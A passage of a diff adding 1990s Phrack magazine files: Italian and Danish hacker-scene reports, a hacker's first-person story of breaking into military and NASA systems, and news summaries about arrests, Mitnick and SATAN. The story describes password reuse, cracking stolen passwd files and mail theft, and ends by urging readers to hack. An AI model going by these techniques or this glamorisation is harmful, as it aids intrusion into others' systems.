+services were provided.  The so called STS (additional telephone services)
+allowing (obviously paying) the teleconference (three user talking
+simultaneously), incoming call signal when you are talking with another
+party, and finally calling transfer, useful when you are away from home.
+The current pulses billed can be inquired (paying one pulse, obviously!).
+
+The Packet Networks
+
+There is only one packet network provider, ITAPAC (DNIC 2222).  As with other
+packet networks, the access is available with a PAD that accepts only NUI
+accounts (non-reverse charging) and those who accept reverse-charge calls
+(in ITAPAC lingo, the 'easy way').  These are heavily hacked because it is
+the most widespread network in Italy (and the most unreliable, insecure, *bad*)
+and also because some NUI users simply were not aware of the costs of this kind
+of service, and they have payed all the phreakers' bills too!
+
+Sometimes, for promotional sales, some NUIs were discharged to the public.
+Other were disseminated by phreakers, collected by PAD (only a few NUIs are
+valid across different PADs, most aren't).  Until some time ago QSD France
+was the most 'in' PAD site.  Another common activity was surfing across
+Packet Networks of different states.  Now many common NUIs were deleted from
+system, but some still survive.  Many times the net is unusable because
+has reached its maximum load or because of for system outages.  Also, even
+if the ports run at 2400 bps, is not uncommon to reach the same speed of a
+1200 bps connection.  Use it if you don't pay or pay a limited fee for it.
+
+The H/P/C/V Scene
+
+Common folklore depicts Italians as adaptable to unfriendly environments in
+a clever way.  Although these rumors are not completely true, there is an
+Italian way of H/P/C/V.  Hacking in Italy is not a common activity.  There
+are several teens who spent lot of effort to learn some tricks, but they
+are teens, with all pros and cons.  Rarely do these individuals survive the
+20 years-old barrier, for one reason or another.  Those who survive generally
+self-limit their actions to a restricted area, and generally remain anonymous.
+The few that remain are the brightest, with lot of know-how and abilities.
+I only know two people at this top rank level.  Hacking is focused on setting
+up unauthorized fsp sites in university computers, removing licenses to pro
+warez and gaining illicit access to some resources in internet or in ITAPAC.
+ITAPAC is now no longer a key issue since ITAPAC (and Italy in general) has
+very few computing resources, and ITAPAC has severe security problems, so it
+is predated by hacker wannabees.  Also Italy lacks of H/P groups like
+LOD,MOD and the CCC. Apart from Omega Team, to my knowledge no other group
+has existed.
+
+Phreaking used to be fairly common, but now is much less so because of
+new digital COs and stricter security.  Blue boxing to USA was *very* common
+until January 1, 1992.  On this date, the software that controls the traffic
+over North America was changed, and boxing to USA is no longer possible.
+Carding now is the only phreak access, and is used mainly by warez board
+sysops.  Rumors said that the software update was imposed on ITALCABLE (that
+manages international calls) by AT&T due to the *huge* illicit traffic between
+Italy-USA.  Basically, too many people, even non H/P ones ('friends of
+friends') were using blue-boxes even without the faintest idea of how they
+worked.  Some hackers have sold boxes to normal people, and this probably was
+the key to the blocking of illicit calls.  Now, to my knowledge, is possible
+to box only to Chile, Argentina and some other third-world countries.
+
+True H/P BBS are few.  One, Pier Group's BBS was the most famous, in part
+because one member, MFB (short for MF the Best, basically the best Italian
+phreaker in my opinion), has written a series of humorous stories about
+hackers and lamerz, that had a phenomenal success.  But since Pier (the
+sysop) was also invloved in some other illegal activities apart phreaking
+(stolen hardware, carding), and in this kind of activity too much advertising
+equals certain arrest, the board went down.  Most other BBS are
+warez-oriented, with warez from THG, Razor 1911 and other USA crack groups.
+Note however that unlike other nations, Italy has no group HQs:  what counts
+is money, not being part of a group.  Many BBS are double-sided:  one a ligit,
+more or less lame, part of a legal net like FidoNET, the other accessible only
+to subscribers, with warez.  This has changed however since the Italian Hacker
+Crackdown.  This is not because the police raided the warez boardz (they are
+too ignorant to do this) but because warez sysops, in fear of being caught,
+have (temporarily) closed their BBSes.
+
+Virusing has some players, though not very publicized, for obvious reasons.
+One has recently become famous (Dr.  Revenge) for his contributions to
+Insane Reality, another H/P/V journal that published some 'secret'
+telephone numbers for United Kingdom officials.
+
+Nothing really new in Italy, as you can see.  Newspapers are (as are most
+people) too ignorant to correctly report these problems, with the result being
+that the 'legal' portion of network fanatics fear other unjustified police
+raids, and legislators are becoming very unfriendly when dealing with this
+kind of communication.  Several politicians and media moguls are proposing
+laws that forbid anonymous access to the Net, and universities are very
+concerned about these subjects.  Two students were recently arrested because
+they used illicit (but almost public) passwords to surf the net (*only* to
+see things, *no* data damage).
+
+Italy may one day become very unfriendly to net people, even if Italians are
+generally considered very friendly.
+
+Zero Uno
+mc1671@mclink.it *only* using PGP, otherwise no response.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3
+
+mQCNAi7zXJ0AAAEEAM3SZQp0+By7fi7ey/oiTU6TT5CdMYdkYnkDeM8f2bZ75Pdp
+4mv9C0BTVRP0UrYgJO1I+8YrwvSjZK7+U3hty+c97RJ5lnSYQ0BbF7puSwhUxj4W
+AyytlQZVP6j1r4H8ulse1arIVlD9h2+GceXOx09J5uEqqhRG/uo1W3A51ixFAAUR
+tBtaZXJvIFVubyA8bWMxNjcxQG1jbGluay5pdD4=
+=9GnS
+-----END PGP PUBLIC KEY BLOCK-----
+
+------------------------------------------------------------------------------
+
+THE DANISH SCENE BY LE CERVEAU
+
+In the last issue of Phrack (46) I read an article about the Danish
+Computer Underground. Though, I was pleased with the text, a lot of
+stuff has happened since which I hope most of you have heard about.
+Anyway, here's an update..
+
+In short, most (nearly all..) of the Inner Circle hackers in Denmark
+have been busted.  It all went down December 1993 where I,
+Descore (Zephyr), Dixie (Nitecrawler) were busted at exactly the same
+time.  After the 3 busts several more followed: WedLock, Netrunner,
+Darkman + some others. I had to spend 14 days in isolation while the
+others were released (somewhat due to my own stupidity).
+
+The busts were made because all of the universities in DK had been
+more or less taken over by hackers and the FBI + CERT & ASSIST
+worked together.  The police told me that UNI*C was threatened to be
+cut off the Internet if the hacking from Denmark didn't stop (don't
+think that's the truth though. They bullshit alot..).
+
+So, of course the Danish police had to do something and they asked
+the infamous Joergen Bo Madsen for help.  And they got it.  And the
+situation in DK was getting out of control too - the Phone Company
+was hacked, DK's main research center hacked.  No damage to ANYTHING
+was done though, but naturally we had to be stopped.  Actually, the
+Phone Cmp. screwed up their own system trying to stop us - and now
+they blame us!
+
+Now we're all awaiting trial.  It might take a while, since they
+said they'd start 'breaking' the PGP-encrypted files with UNI*C's
+computers ;).... I'd think if they did that, it'd be quite a while
+before trials!
+
+Busted in DK: Zephyr aka Descore, Dixie, WedLock, Netrunner,
+              Darkman, Lazarus, Jackal and me (LC).. + Joshua -
+              some idiot who might have helped the police a whole lot.
+
+After the bust of Jackal the police says they can't handle anymore so
+there won't be any.
+
+----------------------------------------------------------------------
+
+BUSTED
+BY LE CERVEAU
+
+I've been busted. Why speak out loud? Why not? I'm screwed anyway.
+
+I was stunned. About six-seven months before my bust I succeeded in
+breaking into a Pentagon computer (pentagon-emh4.army.mil -->
+otjag.army.mil). What actually launched my interest in this computer
+was a file about UFOs where it was listed. Now I have realized that had
+I found anything top secret about UFO cover-ups I probably wouldn't have
+released it. It wants to be free - but the question is to what degree..
+I knew of course that it couldn't be one of their top secret computers
+(actually, OTJAG=Office of The Judge Attorney General - AFAIR) but I
+also knew that it would be the start of something big - one thing
+always leads to another.
+
+After a couple of weeks on the system, doing nothing but leeching
+all the mail I could get my hands on I discovered that one of the
+majors used an Air Force base-server (flite.jag.af.mil - AFAIR). As
+I suspected, all I had to find was his login - the password was
+exactly the same. And again this had to lead to more and it did.
+I found some stupid sergeant who also was a user on TACOM
+(Tank Automotive COMmand). Surely, even though stupid he wouldn't
+use the same.. - yup, he did. Access to tacom-emh1.army.mil and
+all their other machines granted. If you want one of the
+largest lists of MilNet sites then grab /etc/hosts from TACOM.
+After gaining SU-access on this machine interesting things started
+happening. If, for example, an officer was to issue some order (of
+course not any orders concerning war) it'd look something like
+this:
+
+You have to report at HQ Monday latest. Your travelling plans
+for the international conference <blah> <blah> <blah>..
+
+                                  // Signed //
+                                Col. Joe Wilkins
+
+and then some more approved signatures would follow by some
+other persons. Of course I grabbed all the mail on TACOM.
+
+After a month or so I was locked out of the Pentagon system -
+and it changed it's address to otjag.army.mil. But I didn't
+really care. I knew MilNet pretty good so why not I thought..
+
+I started thinking military-systems only - a dangerous thing
+to do. I ended up using all my time on it and was therefore
+also rewarded. Soon I would have access to more than 30 military
+systems around the globe and I knew I was getting in over my head
+but I had to keep going - I felt there was no way back. I could
+have told myself that having to hide on all of these systems
+would be almost impossible. But things seemed to be going just fine.
+Just how idiotic can you get?
+
+With access to some CM-5's and a CM-200 at Naval Research Labs
+and all the wordfiles in the world no system stupid enough to
+let their passwd-file get taken stood a chance - one account with
+encrypted passwd was enough. All I had to do was start Crack on
+the CM-200 and wait.
+
+I took interest in some of the government machines - they weren't
+as hard to hack as the mil's and I soon lost interest. Except in
+NASA. I got in on one of their smaller machines (*.gsfc.nasa.
+gov) and I knew I just had to wait and it would lead to something
+more.
+
+Now 'strange' things started happening. Imagine this: I log in
+on TACOM. I log out. When I try to log in again it's impossible
+from the same site; I have to use another - that's when I knew
+that someone was watching my every step, trying to stop me. Later
+it started happening to me no matter how I accessed the nets. That's
+when I knew the end was near. A month later I was busted by
+the FBI in Denmark - that's the way I feel even though it was the
+Danish police. Actually, the trace was made through *.wwb.noaa.gov
+which I was using a while for cracking.
+
+That's my story - very shortened! If anyone is interested in details
+mail me at Restricted Access # +45-36703060.
+
+Last Words: Don't do it - don't do it.. It'll get you into all kinds of
+shit.. Why bother the nice governments and their so trustworthy agencies?
+On second thought: Just do it!
+
+[Editors note:  Along with this file I was sent a capture of one of
+ the aforementioned hacks (which I promptly deleted).  It looked like
+ our Danish friends were in a host at the office of the Judge Advocate
+ General.  Knowing how the JAG is going to handle cases isn't exactly
+ the kind of thing anyone in the military really wants floating around.
+ I guess they need better security, eh? ]
diff --git a/phrack47/22.txt b/phrack47/22.txt
new file mode 100644
index 0000000..475ba33
--- /dev/null
+++ b/phrack47/22.txt
@@ -0,0 +1,776 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 22 of 22
+
+              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+3 Residents Investigated In Theft Of Phone Card Numbers            Oct 10, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Russ Britt (Los Angeles Daily News)
+
+Three Los Angeles residents have come under investigation in connection with
+the theft of 100,000 telephone calling card numbers used to make $50 million
+worth of long distance calls, officials said.
+
+The Secret Service searched the suspects' residences over the past two weeks
+and found computer disks containing calling card codes, said Jim Bauer,
+special agent-in-charge of he Los Angeles office.
+
+Ivy J. Lay, an MCI switch engineer based in Charlotte, N.C., was arrested
+last week in North Carolina on suspicion of devising computer software to hold
+calling card numbers from carriers that route calls through MCI's equipment,
+the Secret Service said.
+
+Lay is suspected of supplying thousands cards of calling codes to accomplices
+in Los Angeles for $3 to $5 a number, Bauer said.  The accomplices are
+suspected of reselling the numbers to dealers in various cites, who then sold
+them to buyers in Europe, Bauer said.
+
+European participants would purchase the numbers to make calls to the United
+States to pirate computer software via electronic bulletin boards.
+
+-------------------------------------------------------------------------------
+
+Revealed: how hacker penetrated the heart of British intelligence  Nov 24, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Tim Kelsey (The Independent) p. 1
+
+[ In typical British style, The Independent boasts 3 FULL pages on the
+  story of how a "hacker" broke into British Telecom's databases and pulled
+  information regarding sensitive numbers for the Royal Family and
+  MI 5 & 6.
+
+  Reportedly, information was sent anonymously to a reporter named Steve
+  Fleming over the Internet by a "hacker" who got a job as a temp at BT
+  and used their computers to gather the information.  (I heard that Fleming
+  later admitted that "he" was actually the supposed "hacker.")
+
+  This is news?  This is like saying, "Employees at Microsoft gained access to
+  proprietary Microsoft source code," or "CAD Engineers at Ford gained
+  access to super-secret Mustang designs."  Get real. ]
+
+-------------------------------------------------------------------------------
+
+Telecom admits security failings                                   Nov 29, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Tim Kelsey (The Independent) p. 1
+
+[ In typical British style, senior officials at BT attempted to save face
+  by stating that sensitive information such as the file of Royal Family
+  and Intelligence services phone numbers and addresses (currently floating
+  around the Internet) was safe from prying eyes, but could indeed be accessed
+  by BT employees.  Uh, yeah. ]
+
+-------------------------------------------------------------------------------
+Phreak Out!                                                            Dec 1994
+~~~~~~~~~~~
+by Steve Gold (Internet and Comms Today) p. 44
+
+[ A valiant attempt by England's Internet & Comms Today (my favorite
+  Internet-related magazine--by far) to cover the Hack/Phreak scene
+  in the UK, with a few tidbits about us here in the states.  Not
+  100% accurate, but hell, it beats the living shit out of anything
+  ever printed by any US mainstream mag. ]
+
+-------------------------------------------------------------------------------
+
+Hack To The Future                                                     Dec 1994
+~~~~~~~~~~~~~~~~~~
+by Emily Benedek (Details) p. 52
+
+Hacking Vegas                                                          Jan 1995
+~~~~~~~~~~~~~
+by Damien Thorn (Nuts & Volts) p. 99
+
+[ A review of HOPE, and a review of DefCon.  One from a techie magazine whose
+  other articles included:  Build a Telephone Bug, Telephone Inside Wiring
+  Maintenance, Boat GPS on Land and Sea and Killer Serial Communications;
+  the other from a magazine that usually smells more fragrant than Vogue, and
+  whose other articles included:  The Madonna Complex, Brother From Another
+  Planet, Confessions of a Cyber-Lesbian and various fashion pictorials.
+  One written by someone who has been in the hack scene since OSUNY ran on an
+  Ohio-Scientific and the other written by a silly girlie who flitted around
+  HOPE taking pictures of everyone with a polaroid.  You get the idea. ]
+
+-------------------------------------------------------------------------------
+
+Hackers Take Revenge on the Author of New Book on Cyberspace Wars  Dec  5, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Jared Sandberg (The Wall Street Journal) p. B5
+
+In his forthcoming book writer Joshua Quittner chronicles the bizarre but
+true tale of a Hatfield-and-McCoys feud in the nether world of computer
+hackers.
+
+Now the hackers have extracted revenge for Mr. Quittner's attention, taking
+control of his phone line and voice mail and bombarding his on-line account
+with thousands of messages.
+
+"I don't believe I've ever been hacked to this degree," says Mr. Quittner,
+whose book, written with wife Michelle Slatalla, was excerpted in the
+latest issue of Wired magazine, apparently prompting the attack.
+
+"People in MOD and LOD are very unhappy about the story," Mr. Quittner says.
+"That is what I believe prompted the whole thing."
+
+-------------------------------------------------------------------------------
+
+Terror On The Internet                                                 Dec 1994
+~~~~~~~~~~~~~~~~~~~~~~
+By Philip Elmer-Dewitt (Time)
+
+Thanksgiving weekend was quiet in the Long Island, New York, home of Michelle
+Slatalla and Josh Quittner. Too quiet.
+
+"We'd been hacked," says Quittner, who writes about computers, and
+hackers, for the newspaper Newsday, and will start writing for TIME in
+January. Not only had someone jammed his Internet mailbox with thousands of
+unwanted pieces of E-mail, finally shutting down his Internet access
+altogether, but the couple's telephone had been reprogrammed to forward
+incoming calls to an out-of-state number, where friends and relatives heard
+a recorded greeting laced with obscenities. "What's really strange," says
+Quittner, "is that nobody who phoned, including my editor and my
+mother, thought anything of it. They just left their messages and hung up."
+
+It gets stranger. In order to send Quittner that mail bomb, the electronic
+equivalent of dumping a truckload of garbage on a neighbor's front lawn,
+someone, operating by remote control, had broken into computers at IBM,
+Sprint and a small Internet service provider called the Pipeline, seized
+command of the machines at the supervisory, or "root", level, and
+installed a program that fired off E-mail messages every few seconds.
+
+Adding intrigue to insult, the message turned out to be a manifesto that
+railed against "capitalist pig" corporations and accused those companies
+of turning the Internet into an "overflowing cesspool of greed." It was
+signed by something called the Internet Liberation Front, and it ended like
+this: "Just a friendly warning corporate America; we have already stolen
+your proprietary source code. We have already pillaged your million dollar
+research data. And if you would like to avoid financial ruin, get the
+((expletive deleted)) out of Dodge. Happy Thanksgiving Day turkeys."
+
+It read like an Internet nightmare come true, a poison arrow designed to
+strike fear in the heart of all the corporate information managers who had
+hooked their companies up to the information superhighway only to discover
+that they may have opened the gate to trespassers. Is the I.L.F. for real?
+Is there really a terrorist group intent on bringing the world's largest
+computer network to its knees?
+
+That's what is so odd about the so-called Internet Liberation Front. While
+it claims to hate the "big boys" of the telecommunications industry and
+their dread firewalls, the group's targets include a pair of journalists and
+a small, regional Internet provider. "It doesn't make any sense to me,"
+says Gene Spafford, a computer-security expert at Purdue University.
+"I'm more inclined to think it's a grudge against Josh Quittner."
+
+That is probably what it was. Quittner and Slatalla had just finished a book
+about the rivalry between a gang of computer hackers called the Masters
+of Deception and their archenemies, the Legion of Doom, an excerpt of
+which appears in the current issue of Wired magazine. And as it turns out,
+Wired was mail-bombed the same day Quittner was, with some 3,000 copies
+of the same nasty message from the I.L.F. Speculation on the Net at week's
+end was that the attacks may have been the work of the Masters of Deception,
+some of whom have actually served prison time for vandalizing the computers
+and telephone systems of people who offend them.
+
+-------------------------------------------------------------------------------
+
+The Phreak Show                                                 Feb  5, 1995
+~~~~~~~~~~~~~~~
+By G. Pascal Zachary (Mercury News)
+
+"Masters of Deception" provides an important account of this hidden hacker
+world. Though often invoked by the mass media, the arcana of hacking have
+rarely been so deftly described as in this fast-paced book. Comprised of
+precocious New York City high schoolers, the all-male "Masters of Deception"
+(MOD) gang are the digital equivalent of the 1950s motorcyclists who roar
+into an unsuspecting town and upset things for reasons they can't even explain.
+
+At times funny and touching and other times pathetic and disturbing, the
+portrait of MOD never quite reaches a crescendo. The authors, journalists
+Michelle Slatalla of Newsday and Joshua Quittner of Time, fail to convey
+the inner lives of the MOD. The tale, though narrated in the MOD's
+inarticulate, super-cynical lingo and packed with their computer stunts,
+doesn't convey a sense of what makes these talented oddballs tick.
+
+Too often the authors fawn all over their heroes. In "Masters of Deception,"
+every hacker is a carefree genius, benign and childlike, seeking only to
+cavort happily in an electronic Garden of Eden, where there are no trespassing
+prohibitions and where no one buys or sells information.
+
+Come on. Phiber and phriends are neither criminals nor martyrs. The issue of
+rights and responsibilities in cyberspace is a lot more complicated than
+that. Rules and creativity can co-exist; so can freedom and privacy. If
+that's so hard to accept, a full 25 years after the birth of the
+Internet, maybe it's time to finally get rid of the image of the hacker
+as noble savage. It just gets in the way.
+
+-------------------------------------------------------------------------------
+
+Hacking Out A Living                                               Dec  8, 1994
+~~~~~~~~~~~~~~~~~~~~
+by Danny Bradbury (Computing) p. 30
+
+There's nothing like getting it from the horse's mouth, and that's exactly
+what IT business users, anxious about security, did when they went to a recent
+conference given by ex-hacker, Chris Goggans.
+
+[ Yeah, so it's a blatant-plug for me.  I'm the editor.  I can do that.
+  (This was from one of the seminars I put on in Europe) ]
+
+-------------------------------------------------------------------------------
+
+Policing Cyberspace                                                Jan 23, 1995
+~~~~~~~~~~~~~~~~~~~
+by Vic Sussman (US News & World Report) p. 54
+
+[ Yet another of the ever-growing articles about high-tech cops.  Yes, those
+  dashing upholder of law and order, who bravely put their very lives
+  on the line to keep America free from teenagers using your calling card.
+
+  Not that I wouldn't have much respect for our High-Tech-Crimefighters, if
+  you could ever show me one.  Every High-Tech Crime Unit I've ever seen
+  didn't have any high-tech skills at all...they just investigated low-tech
+  crimes involving high-tech items (ie. theft of computers, chips, etc.)
+  Not that this isn't big crime, its just not high tech.  Would they
+  investigate the theft of my Nientendo?  If these self-styled cyber-cops
+  were faced with a real problem, such as the theft of CAD files or illegal
+  wire-transfers, they'd just move out of the way and let the Feds handle
+  it.  Let's not kid ourselves. ]
+
+-------------------------------------------------------------------------------
+
+Hacker Homecoming                                                  Jan 23, 1995
+~~~~~~~~~~~~~~~~~
+by Joshua Quitter (Newsweek) p. 61
+
+The Return of the Guru                                             Jan 23, 1995
+~~~~~~~~~~~~~~~~~~~~~~
+by Jennifer Tanaka and Adam Rogers (Time) p. 8
+
+[ Two articles about Mark "Phiber Optik" Abene's homecoming party.
+  Amazing.  Just a few years earlier, Comsec was (I think) the first
+  group of hackers to make Time & Newsweek on the same date.
+  Now, all someone has to do is get out of jail and they score a similar
+  coup.  Fluff stories to fill unsold ad space. ]
+
+-------------------------------------------------------------------------------
+
+Data Network Is Found Open To New Threat                           Jan 23, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times) p. A1
+
+A Federal computer security agency has discovered that unknown intruders
+have developed a new way to break into computer systems, and the agency
+plans on Monday to advise users how to guard against the problem.
+
+The first known attack using the new technique took place on Dec. 25
+against the computer of a well-known computer security expert at the
+San Deigo Supercomputer Center.  An unknown individual or group took
+over his computer for more then a day and electronically stole a large
+number of security programs he had developed.
+
+The flaw, which has been known as a theoretical possibility to computer
+experts for more than a decade, but has never been demonstrated before,
+is creating alarm among security experts now because of the series of
+break-ins and attacks in recent weeks.
+
+The weakness, which was previously reported in technical papers by
+AT&T researchers, was detailed in a talk given by Tsutomo Shimomura,
+a computer security expert at the San Deigo Supercomputer Center, at a
+California computer security seminar sponsored by researchers at the
+University of California at Davis two weeks ago.
+
+Mr. Shimomura's computer was taken over by an unknown attacker who then
+copied documents and programs to computers at the University of Rochester
+where they were illegally hidden on school computers.
+
+-------------------------------------------------------------------------------
+
+A Most-Wanted Cyberthief Is Caught In His Own Web                  Feb 16, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times) p. A1
+
+After a search of more than two years, a team of FBI agents early this
+morning captured a 31-year-old computer expert accused of a long crime
+spree that includes the theft of thousands of data files and at least
+20,000 credit card numbers from computer systems around the nation.
+
+Federal officials say Mr. Mitnick's confidence in his hacking skills may
+have been his undoing.  On Christmas Day, he broke into the home computer
+of a computer security expert, Tsutomo Shimomura, a researcher at the
+federally financed San Deigo Supercomputer Center.
+
+Mr. Shimomura then made a crusade of tracking down the intruder, an obsession
+that led to today's arrest.
+
+It was Mr. Shimomura, working from a monitoring post in San Jose, California,
+who determined last Saturday that Mr. Mitnick was operating through a computer
+modem connected to a cellular telephone somewhere near Raleigh, N.C.
+
+"He was a challenge for law enforcement, but in the end he was caught by his
+own obsession," said Kathleen Cunningham, a deputy marshal for the United
+States Marshals Service who has pursued Mr. Mitnick for several years.
+
+-------------------------------------------------------------------------------
+
+Computer Users Beware: Hackers Are Everywhere
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Michelle V. Rafter (Reuters News Sources)
+
+System Operators Regroup In Wake Of Hacker Arrest
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Elizabeth Weise (AP News Sources)
+
+Computer Hacker Seen As No Slacker
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Paul Hefner (New York Times)
+
+Kevin Mitnick's Digital Obsession
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Josh Quittner (Time)
+
+A Superhacker Meets His Match
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Katie Hafner (Newsweek)
+
+Cracks In The Net
+~~~~~~~~~~~~~~~~~
+by Josh Quittner (Time)
+
+Undetected Theft Of Credit-Card Data Raises Concern About Online Security
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Jared Sandberg (The Wall Street Journal)
+
+[Just a sampling of the scores of Mitnick articles that inundated the
+ news media within hours of his arrest in North Carolina.  JUMP ON THE
+ MITNICK BANDWAGON!  GET THEM COLUMN INCHES!  WOO WOO!]
+
+-------------------------------------------------------------------------------
+
+Hollywood Gets Into Cyberspace With Geek Movies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Therese Poletti (Reuters News Sources)
+
+With dramatic tales like the capture last week of a shadowy computer hacker
+wanted around the world, Hollywood studios are scrambling to cash in on
+the growing interest in cyberspace.
+
+"They are all looking at computer-related movies because computers are
+hot," said Bishop Kheen, a Paul Kagan analyst. "They are all reviewing
+scripts or have budgets for them. "We are going to see a rash of these
+kinds of movies."
+
+Experts say it remains to be seen what kind of box office draw can be
+expected from techie movies such as one that might be based on the hunt for
+Mitnick. But the recent surge of interest in the Internet, the high-profile
+criminal cases, and romanticized images of hackers may fuel their popularity.
+
+"I think it's a limited market, although given the media's insatiable
+appetite for Internet hype, these movies might do well," said Kevin
+Benjamin, analyst with Robertson Stephens.
+
+TriStar Pictures and Columbia Pictures, both divisions of Sony Corp., are
+developing movies based on technology or computer crime, executives said.
+
+TriStar is working on a movie called "Johnny Mnemonic," based on a science
+fiction story by William Gibson, about a futuristic high-tech "data courier"
+with confidential information stored in a memory chip implanted in his head.
+
+Sony also has plans for a CD-ROM game tied to the movie, also called
+"Johnny Mnemonic," developed by Sony Imagesoft, a division of Sony
+Electronic Publishing.
+
+Columbia Pictures has a movie in development called "The Net," starring
+Sandra Bullock, who played opposite Reeves in "Speed." Bullock plays a
+reclusive systems analyst who accidentally taps into a classified program and
+becomes involved in a murder plot. Sony Imagesoft has not yet decided whether
+it will develop a CD-ROM game version of "The Net."
+
+MGM/United Artists is said to be working on a movie called "Hackers,"
+about a group of young computer buffs framed for a crime and trying to
+protect their innocence. An MGM/UA spokeswoman did not return calls seeking
+comment.
+
+Disney is also said to be working on a movie called f2f, (face to face), about
+a serial killer who tracks his victims on an online service. Disney also did
+not return calls.
+
+Bruce Fancher, once a member of the Legion of Doom hacker gang, worked as a
+consultant for "Hackers." He said, much to his dismay, hackers are becoming
+more popular and increasingly seen as romantic rebels against society.
+
+"I've never met one that had political motivation. That is really something
+projected on them by the mainstream media," Fancher said.
+
+-------------------------------------------------------------------------------
+
+Film, Multimedia Project In The Works On Hacker Kevin Mitnick      Mar  8, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Greg Evans (Variety)
+
+Miramax Films will produce a film and a multimedia project based on the
+hunt for accused cyber felon Kevin Mitnick, the computer criminal who
+captured the attention of the New York Times, the FBI and Hollywood.
+
+Less than a month after Mitnick's capture made the front page of Feb. 16's
+Times, Miramax has purchased the worldwide film and interactive rights to
+the hacker's tale.
+
+Rights were bought for an undisclosed amount from computer security expert
+Tsutomu Shimomura, who led the two-year pursuit of Mitnick, and reporter
+John Markoff, who penned the Times' article.
+
+Markoff will turn his article into a book, which will be developed into a
+script. "Catching Kevin: The Pursuit and Capture of America's Most Wanted
+Computer Criminal" will be published later this year by Miramax's sister
+company, Hyperion Books (both companies are owned by the Walt Disney Co.).
+
+Miramax also plans to work with Shimomura to develop an interactive
+project, most likely a CD-ROM, based on "Catching Kevin," according to
+Scott Greenstein, Miramax's senior VP of motion pictures, music, new media
+and publishing. He represented Miramax in the deal.
+
+No director has been attached to the film project yet, although the company
+is expected to make "Kevin" a high priority.
+
+The story attracted considerable studio attention. In a statement, Shimomura
+said he went with Miramax "based on their track record."
+
+Shimomura and Markoff were repped by literary and software agent John Brockman
+and Creative Artists Agency's Dan Adler and Sally Willcox.
+
+-------------------------------------------------------------------------------
+
+Hack-Happy Hollywood                                                   Mar 1995
+~~~~~~~~~~~~~~~~~~~~
+(AP News Sources)
+
+Not since the heyday of Freddy Krueger and Jason Voorhees has hacking been
+so in demand in Hollywood.
+
+Only this time, it's computer hackers, and the market is becoming glutted
+with projects. In fact, many studio buyers were reluctant to go after the
+screen rights to the story of computer expert Tsutomu Shimomura, who tracked
+down the notorious cyber-felon Kevin Mitnick.
+
+The rights were linked to a New York Times article by John Markoff, who's
+turning the story into a book.
+
+But Miramax wasn't daunted by any competing projects, and snapped up the
+rights.
+
+"We're talking about a ton of projects that all face the same dilemma: How
+many compelling ways can you shoot a person typing on a computer terminal?"
+said one buyer, who felt the swarm of projects in development could face
+meltdown if the first few films malfunction.
+
+The first test will come late summer when United Artists opens "Hackers,"
+the Iain Softley-directed actioner about a gang of eggheads whose hacking
+makes them prime suspects in a criminal conspiracy.
+
+Columbia is currently in production on "The Net," with Sandra Bullock as
+an agoraphobic computer expert who's placed in danger when she stumbles onto
+secret files.
+
+Touchstone has "The Last Hacker," which is closest in spirit to the Miramax
+project. It's the story of hackmeister Kevin Lee Poulson, who faces a hundred
+years in prison for national security breaches and was so skilled he disabled
+the phones of KIIS-FM to be the 102nd (and Porsche-winning) caller. He was
+also accused of disabling the phones of "Unsolved Mysteries" when he was
+profiled.
+
+Simpson/Bruckheimer is developing "f2f," about a serial killer who surfs
+the Internet for victims.
+
+Numerous other projects are in various stages of development, including
+MGM's "The Undressing of Sophie Dean" and the Bregman/Baer project
+"Phreaking," about a pair of hackers framed for a series of homicidal
+computer stunts by a psychotic hacker.
+
+-------------------------------------------------------------------------------
+
+A Devil Of A Problem                                               Mar 21, 1995
+~~~~~~~~~~~~~~~~~~~~
+by David Bank (Knight-Ridder)
+
+Satan is coming to the Internet and might create havoc for computer networks
+around the world.
+
+The devilish software, due for release April 5, probes for hidden flaws
+in computer networks that make them vulnerable to intruders.  The tool could
+be used by mischievous pranksters or serious espionage agents to attack and
+penetrate the computer networks of large corporations, small businesses or even
+military and government installations.
+
+None of the potential problems has swayed the authors of the program, Dan
+Farmer, the "network security czar" of Silicon Graphics Inc. in Mountain
+View, California, and Wietse Venema, his Dutch collaborator.
+
+"Unfortunately, this is going to cause some serious damage to some people,"
+said Farmer, who demonstrated the software this month in his San Francisco
+apartment.  "I'm certainly advocating responsible use, but I'm not so
+naive to think it won't be abused."
+
+"It's an extremely dangerous tool," said Donn Parker, a veteran computer
+security consultant with SRI International in Menlo Park, California.  "I
+think we're on the verge of seeing the Internet completely wrecked in a sea
+of information anarchy."
+
+Parker advocates destroying every copy of Satan.  "It shouldn't even be
+around on researcher's disks," he said.
+
+-------------------------------------------------------------------------------
+
+Satan Claims Its First Victim                                      Apr  7, 1995
